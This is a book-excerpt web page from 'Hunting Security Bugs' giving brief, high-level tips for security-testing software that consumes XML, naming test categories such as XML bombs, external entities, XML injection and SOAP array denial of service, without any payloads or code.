Testing Tips

Previous page
Table of content
Next page

Use the following tips when you are testing products that use XML:

  • When you test an application that consumes XML input, do not limit testing to XML-specific cases. Most non-XML-specific attacks (HTML scripting attacks, spoofing, buffer overflows, information disclosure, etc.) can occur through XML.

  • Use CDATA and character references to include arbitrary characters as part of the XML, while still creating well- formed and valid XML.

  • When creating XML input, it is important to use an editor that allows complete control of all aspects of the data. For example, an XML-specific editor might not allow you to create certain fields or might automatically change data when saving it. A basic text or binary editor is ideal for XML files and a Web proxy for SOAP messages.

  • Dont forget the XML- and SOAP-specific tests, including infinite entity reference loops , XML bombs , complex XML, external entities, XML injection, large file references, and SOAP array DoS.


Previous page
Table of content
Next page
Hunting Security Bugs
Hunting Security Bugs
ISBN: 073562187X
EAN: 2147483647
Year: 2004
Pages: 156
Authors: Tom Gallagher, Lawrence Landauer, Bryan Jeffries
BUY ON AMAZON
Adobe After Effects 7.0 Studio Techniques
Excel Scientific and Engineering Cookbook (Cookbooks (OReilly))
Programming Microsoft ASP.NET 3.5
After Effects and Photoshop: Animation and Production Effects for DV and Film, Second Edition
The Lean Six Sigma Pocket Toolbook. A Quick Reference Guide to Nearly 100 Tools for Improving Process Quality, Speed, and Complexity
FileMaker 8 Functions and Scripts Desk Reference
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy